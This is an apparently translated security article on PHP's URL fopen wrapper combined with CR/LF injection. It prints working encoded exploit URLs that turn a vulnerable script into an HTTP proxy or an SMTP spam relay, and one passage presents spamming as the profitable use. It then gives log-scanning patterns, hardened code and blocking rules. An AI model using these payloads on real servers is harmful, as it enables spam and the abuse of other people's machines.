File opening and external data: a potential vulnerability in PHP scripts
The functions fopen, file, include and require can open files from other sites over the HTTP and FTP protocols. That capability creates a potential vulnerability in PHP scripts and can allow a site to be used as a proxy.
In 2002, several groups that search for vulnerabilities in software found a serious vulnerability in PHP.
Vulnerability
URL fopen wrapper
To increase functionality and simplify coding, the PHP developers built this feature into the fopen, file and include functions. If the file name starts with "http://", the server performs an HTTP request, loads the page, and returns it to the variable just as it would the contents of an ordinary file. The prefixes "ftp://" and "php://" work analogously. This was done to spare programmers the trouble of using HTTP client libraries or writing the requests by hand. The option can be switched off in the PHP settings with the allow_url_fopen parameter.
CR/LF in HTTP requests
The combination of the carriage-return and line-feed characters separates headers in an HTTP request. That combination can be passed in a GET request as "%0D%0A".
Untrusted input
Pages on many sites are generated by a template script. The name of the file to open is taken from REQUEST_URI. After the file is read, the template with the navigation and header is added to it, and the client sees the result.
An unskilled programmer can easily write the file opening without checking the data:
<?php
// Vulnerable: the path is taken straight from the request URI without any check
echo implode("", file(substr($REQUEST_URI, 1)));
?>
The first character of the request, the slash, is stripped off and the file is opened. A malicious user can simply supply a URL as the path to the file on the server: requesting http://n00b.programmer.com/http://example.com makes the script fetch http://example.com. In another variant, all addresses on the site look like http://n00b.programmer.com/index.php?f=news; in that case the attacker will try to open an address like http://n00b.programmer.com/index.php?f=http://example.com. It is very important not to trust input data and to filter incoming requests.
Exploit
The address in the example below cannot be checked, so a line containing a complete HTTP request can be entered. If the attacker opens the path:
index.php?f=http%3A%2F%2Fexample.com%2F+HTTP%2F1.0%0D%0A%0D%0AHost:+example.com%0D%0AUser-agent:+Space+Bizon%2F9%2E11%2E2001+%28Windows+67%29%0D%0Avar1%3Dfoo%26var2%3Dbar%0D%0A%0D%0A
the script will send the following HTTP request:
GET example.com/ HTTP/1.0\r\n
Host: example.com\r\n
User-agent: Space Bizon/9.11.2001 (Windows 67)\r\n
var1=foo&var2=bar\r\n
\r\n
HTTP/1.0\r\n
Host: www.site1.st\r\n
User-Agent: PHP/4.1.2\r\n
\r\n
The last three lines are added by the script automatically, but the \r\n before them already marks the end of the request. Thus an unprotected script can be used as a proxy server.
Using the exploit
If a provider that gives free demo access has such a broken site, one can write a script on a home server that forms requests through this proxy. That might be considered an instructive case, but in fact it is just mischief. A more profitable use of someone else's machine is commercial spam distribution. For example:
index.php?f=http%3A%2F%2Fmail.example.com%3A25%2F+HTTP/1.0%0D%0AHELO+my.own.machine%0D%0AMAIL+FROM%3A%3Cme%40my.own.machine%3E%0D%0ARCPT+TO%3A%3Cinfo%40site1.st%3E%0D%0ADATA%0D%0Ai+will+never+say+the+word+PROCRASTINATE+again%0D%0A.%0D%0AQUIT%0D%0A%0D%0A
The PHP module connects to the mail.example.com server and sends the following:
GET / HTTP/1.0\r\n
HELO my.own.machine\r\n
MAIL FROM:<me@my.own.machine>\r\n
RCPT TO:<info@site1.st>\r\n
DATA\r\n
i will never say the word PROCRASTINATE again\r\n
.\r\n
QUIT\r\n\r\n
HTTP/1.0\r\n
Host: mail.site1.st:25\r\n
User-Agent: PHP/4.1.2\r\n\r\n
PHP and the mail server will both complain, but the e-mail message will still be sent. Given such a vulnerability on a site, one can look for a closed mail relay that accepts mail from the web server. That relay will not be on the providers' black lists, so spam distribution can be very effective.
Checking the request log
First, get acquainted with the list of unique addresses requested from the site. It helps to find out whether there have been attacks. Usually spammers look for a chance to connect to the mail relay they need on port 25, so look for the following strings: ":25" and "%3A25".
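As an added example (not part of the original article), the following PHP script applies the check described above to a few constructed Apache-style log lines, URL-decoding each request target before looking for ":25", CR/LF, or a URL supplied as a parameter value; the log format and the client addresses are assumptions.

```php
<?php
// Added example, not from the article: scan an Apache-style access log for
// the request patterns described above (":25" or "%3A25" aimed at a mail
// relay, encoded CR/LF, and a URL handed to a script parameter). The log
// lines are constructed for this example; the client addresses are fictional.

$sampleLog = <<<'LOG'
203.0.113.5 - - [10/Mar/2002:10:01:02 +0000] "GET /index.php?f=news HTTP/1.0" 200 2311
203.0.113.9 - - [10/Mar/2002:10:05:17 +0000] "GET /index.php?f=http%3A%2F%2Fmail.example.com%3A25%2F+HTTP/1.0%0D%0AHELO+my.own.machine%0D%0A HTTP/1.0" 200 88
198.51.100.7 - - [10/Mar/2002:10:06:40 +0000] "GET /index.php?f=http://example.com/ HTTP/1.0" 200 512
203.0.113.9 - - [10/Mar/2002:10:07:00 +0000] "GET /index.php?f=news%0D%0AHost:+x HTTP/1.0" 200 2311
LOG;

// Return one finding per suspicious request: [client, reason, request target].
function scan_access_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Pull the client address and the request target out of the quoted
        // request line; the target is everything up to the next space.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)/',
                        $line, $m)) {
            continue;
        }
        $client = $m[1];
        $target = $m[2];
        // Decode once so "%3A25" and ":25" are examined the same way.
        $decoded = rawurldecode($target);
        $reasons = [];
        if (preg_match('/[\r\n]/', $decoded)) {
            $reasons[] = 'CR/LF in request';
        }
        if (preg_match('/:25(?:\/|$|\s)/', $decoded)) {
            $reasons[] = 'port 25 in parameter';
        }
        // A parameter whose value is itself a URL reaches the fopen wrapper.
        if (preg_match('#[?&][^=&]+=[a-z][a-z0-9+.-]*://#i', $decoded)) {
            $reasons[] = 'URL passed as parameter';
        }
        foreach ($reasons as $reason) {
            $findings[] = [$client, $reason, $target];
        }
    }
    return $findings;
}

foreach (scan_access_log($sampleLog) as [$client, $reason, $target]) {
    printf("%-13s %-24s %s\n", $client, $reason, $target);
}
```

Run it against a real log by replacing $sampleLog with file_get_contents() of the access log; the same request can produce several findings, which is useful when sorting by client address.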
PHP settings
The simplest protection is to forbid opening URLs with the file functions. If you are the server administrator, disable allow_url_fopen in the PHP settings. If you are a client, disable it locally: in the .htaccess file in the site root, write the line php_value allow_url_fopen 0. If you are a hosting provider, you can disable the URL fopen wrapper for all clients with the php_admin_value directive.
Changing the code
It may happen that you are a client and the hosting provider's administrator has fixed all PHP settings with php_admin_value, so they cannot be changed. In that case you have to modify the script code. The simplest way is to find the fopen, file and include calls and strip the http:// and ftp:// prefixes with the str_replace function.
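As an added example (not the article's code), here is a hardened replacement for the index.php?f=news pattern shown in the untrusted-input section; it rejects anything that is not a bare page name rather than stripping prefixes, because a single str_replace pass leaves nested forms such as hthttp://tp:// intact. The pages/ directory layout, the .html suffix and the function names are assumptions.

```php
<?php
// Added example, not the article's code. It replaces the vulnerable
// file(substr($REQUEST_URI, 1)) pattern: instead of stripping "http://"
// with str_replace (one pass turns "hthttp://tp://" into "http://"), the
// page name from ?f=... is validated and then resolved inside one fixed
// directory. The pages/ layout and the .html suffix are assumptions.

// A page name is a short bare token: no "/", ":", ".", "%", or CR/LF, so no
// URL scheme, no path traversal and no injected request line gets through.
function is_valid_page_name(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name) === 1;
}

// Map a validated name to a real file and confirm it still lies under
// $pagesDir after symlinks and ".." are resolved; null if it does not.
function safe_page_path(string $name, string $pagesDir): ?string
{
    if (!is_valid_page_name($name)) {
        return null;
    }
    $real = realpath($pagesDir . '/' . $name . '.html');
    $base = realpath($pagesDir);
    if ($real === false || $base === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

if (PHP_SAPI === 'cli') {
    // Offline check with constructed inputs, including the article's probes.
    $probes = ['news', 'http://example.com', "news\r\nHost: x",
               '../etc/passwd', 'mail.example.com:25', 'php://input'];
    foreach ($probes as $p) {
        printf("%-28s %s\n", json_encode($p),
               is_valid_page_name($p) ? 'accepted' : 'rejected');
    }
} else {
    // Web entry point: the page name is the only input the script uses.
    $f = $_GET['f'] ?? 'index';
    $path = is_string($f) ? safe_page_path($f, __DIR__ . '/pages') : null;
    if ($path === null) {
        http_response_code(404);
        exit('No such page');
    }
    echo implode('', file($path));   // local file only; URL wrappers unreachable
}
```

Run from the command line it prints which probe names pass validation; served by a web server it behaves as the hardened index.php, and with this check in place the allow_url_fopen setting no longer matters for this script.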
Terminating an attacking request early
A client scanning your site for vulnerable variables creates extra traffic and loads the server processor. He has no use for the pages your site generates if they do not work as a proxy. It is better to stop such requests before the PHP interpreter is even launched. You can do that with the mod_rewrite module: in the .htaccess file in the site root, add the following line:
RewriteRule ((%3A|:)25|%0D%0A) - [G]
This assumes that forms on your site are not submitted with the GET method, because otherwise they would be stopped by this rule. If you use mod_rewrite for addressing, colons and CRLF are probably not used in your URLs, so the other RewriteRule lines will not match a scanning request, and the rule that terminates request processing should be placed at the end of the rule list.